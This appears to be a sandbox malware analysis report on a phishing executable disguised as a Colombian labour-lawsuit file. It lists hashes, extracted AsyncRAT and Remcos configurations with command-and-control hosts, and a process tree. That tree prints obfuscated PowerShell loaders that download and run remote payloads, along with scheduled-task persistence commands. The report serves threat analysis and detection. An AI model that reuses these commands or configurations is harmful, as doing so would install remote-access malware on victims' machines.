Overview
overview
10Static
static
32 DEMNADA ...AL.exe
windows7-x64
102 DEMNADA ...AL.exe
windows10-2004-x64
102 DEMNADA ...32.dll
windows7-x64
32 DEMNADA ...32.dll
windows10-2004-x64
32 DEMNADA ...32.dll
windows7-x64
32 DEMNADA ...32.dll
windows10-2004-x64
32 DEMNADA ...ar.dll
windows7-x64
32 DEMNADA ...ar.dll
windows10-2004-x64
3Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
30-08-2024 16:47
Static task
static1
Behavioral task
behavioral1
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/madHcNet32.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/madHcNet32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/mvrSettings32.dll
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/mvrSettings32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/unrar.dll
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/unrar.dll
Resource
win10v2004-20240802-en
General
-
Target
2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe
-
Size
3.1MB
-
MD5
b841d408448f2a07f308ced1589e7673
-
SHA1
f5b5095c0ed69d42110df6d39810d12b1fa32a1e
-
SHA256
69a90665113bd73b30360d87f7f6ed2c789a90a67f3b6e86474e21273a64f699
-
SHA512
a689734048109ab7bec9491bbb7781686c19c7885166b3ca2975e2f49e956fcc388cd8ca85a4e5a8bf9efe6056f1e0d80197b7f521d4f0d4cadb10ba9ef1fa93
-
SSDEEP
49152:pvFg5qg9BtIAHE3SM4ahx6LK2SamuZob+tCjNrv8:Jm5qGBHBLRKuZfkjNrv8
Malware Config
Extracted
https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
Default
enviasept.duckdns.org:3030
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
remcos
RemoteHost
sost2024ene.duckdns.org:1213
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-ZJ3RBQ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3508 4316 schtasks.exe 113 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1948 4316 schtasks.exe 113 -
Blocklisted process makes network request 3 IoCs
flow pid Process 71 624 powershell.exe 73 624 powershell.exe 75 624 powershell.exe -
pid Process 2128 powershell.exe 624 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 70 bitbucket.org 71 bitbucket.org -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3248 set thread context of 4916 3248 1 DEMANADA LABORAL.exe 87 PID 4916 set thread context of 1856 4916 cmd.exe 98 PID 624 set thread context of 3060 624 powershell.exe 116 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1 DEMANADA LABORAL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings MSBuild.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3508 schtasks.exe 1948 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 3248 1 DEMANADA LABORAL.exe 3248 1 DEMANADA LABORAL.exe 3248 1 DEMANADA LABORAL.exe 3248 1 DEMANADA LABORAL.exe 4916 cmd.exe 4916 cmd.exe 2128 powershell.exe 1856 MSBuild.exe 2128 powershell.exe 624 powershell.exe 624 powershell.exe 1856 MSBuild.exe 1856 MSBuild.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3248 1 DEMANADA LABORAL.exe 4916 cmd.exe 4916 cmd.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1856 MSBuild.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 624 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3060 RegSvcs.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 3248 wrote to memory of 4916 3248 1 DEMANADA LABORAL.exe 87 PID 3248 wrote to memory of 4916 3248 1 DEMANADA LABORAL.exe 87 PID 3248 wrote to memory of 4916 3248 1 DEMANADA LABORAL.exe 87 PID 3248 wrote to memory of 4916 3248 1 DEMANADA LABORAL.exe 87 PID 4916 wrote to memory of 1856 4916 cmd.exe 98 PID 4916 wrote to memory of 1856 4916 cmd.exe 98 PID 4916 wrote to memory of 1856 4916 cmd.exe 98 PID 4916 wrote to memory of 1856 4916 cmd.exe 98 PID 4916 wrote to memory of 1856 4916 cmd.exe 98 PID 1856 wrote to memory of 4976 1856 MSBuild.exe 108 PID 1856 wrote to memory of 4976 1856 MSBuild.exe 108 PID 1856 wrote to memory of 4976 1856 MSBuild.exe 108 PID 4976 wrote to memory of 2128 4976 WScript.exe 109 PID 4976 wrote to memory of 2128 4976 WScript.exe 109 PID 4976 wrote to memory of 2128 4976 WScript.exe 109 PID 2128 wrote to memory of 624 2128 powershell.exe 111 PID 2128 wrote to memory of 624 2128 powershell.exe 111 PID 2128 wrote to memory of 624 2128 powershell.exe 111 PID 1856 wrote to memory of 5052 1856 MSBuild.exe 112 PID 1856 wrote to memory of 5052 1856 MSBuild.exe 112 PID 1856 wrote to memory of 5052 1856 MSBuild.exe 112 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 624 wrote to memory of 3060 624 powershell.exe 116 PID 1856 wrote to memory of 4024 1856 MSBuild.exe 117 PID 1856 wrote to memory of 4024 1856 MSBuild.exe 117 PID 1856 wrote to memory of 4024 1856 MSBuild.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe"C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\emffxb.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bi▒GU▒YwBs▒HY▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Gs▒YgB1▒G8▒aQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G4▒YQBn▒HI▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒YQBn▒HI▒b▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒LgBz▒HM▒bwBj▒G0▒ZQBy▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBy▒GY▒aQBk▒HY▒cgBl▒HM▒LwB0▒Gc▒ZwBn▒HI▒YQBj▒HM▒ZQBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒YgB1▒G8▒aQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBm▒GQ▒ZwBo▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bi▒GU▒YwBs▒HY▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\emffxb.vbs');powershell -command $KByHL;5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$beclv = '0';$kbuoi = 'C:\Users\Admin\AppData\Local\Temp\emffxb.vbs';[Byte[]] $nagrl = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($nagrl).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.ssocmer/sdaolnwod/rfidvres/tgggracsed/gro.tekcubtib//:sptth' , $kbuoi , '_____fdgh__________________-------------', $beclv, '1', 'Roda' ));"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3060
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ykbqbu.wsf"4⤵
- System Location Discovery: System Language Discovery
PID:5052
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ybyaxf.wsf"4⤵
- System Location Discovery: System Language Discovery
PID:4024
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3508
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1948
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD547ad785a164d8ff087b5fc8372b82520
SHA1f23b4ab647065004331d06eb701783f4c89a74dd
SHA25603c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a
SHA512c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4
-
Filesize
12KB
MD565eece6e45e86ccf90a896b005f67a30
SHA1be24253a36044cd6ad74c35686eb9e3d630383fe
SHA256a5a5a9b25ec1cd22388f9c467de7ca5a0881a5f223e248b718e97c6fe1cd2607
SHA5129e1e3eeddba53213166a4eb3e06dc84dc763ad63aab2f48c653d5dfdea32d12194495ac2992f7008a2dc7d8e27c9b24ed6587b2a439e0c16582c15eda93cafda
-
Filesize
780KB
MD5e4978fbee6b1dd9aab76c06fd0cefc88
SHA1f931b99a911b2231802f10666da3da88326b8fe2
SHA256d5f8127a6762ae81d94d6c47e027ef74636bfe9a411c7ec266474aa420402990
SHA512b9778ca17f1e3161b78af16706a439c32eff7803e0486baa1f9dc524780187924f4facdccf731c9f9e6264db996ef7ce77c9762db7ac12fd2cde259f2a95df56
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11.3MB
MD54195393370dff560c647cea03c986705
SHA17fcbf81466c0dc1760205570c1248f80466da3f9
SHA2567a82d66ac151f833b0b617777c883c9e02cf88d90b9394ec39ec6f80599e34e5
SHA5122a74330dea0b751b7096fff9e08deee5122e66c6e5febb94dd97dfc5c3f9d51614f6eb6057c7d2bdec64f9d24e744871a3a050c6f129b77e2e6b845d0c6f4f91
-
Filesize
164KB
MD52e3704d10448cd561922b7561e6ec94c
SHA1fd831fdcb2e0dd360b4765466d5384a1b3fa3ac1
SHA2562b982915d800128a0149437f42684068a781e133ad607889f932fc9bec04b086
SHA512fc8f204d28ed1494894008b7417885a5df8b5fb99c99f56cf9a8deee935334759576d7b2b840d1c8b004d3e4c9ad27fe0036b1b7a4d806c5666d5c1acebb9852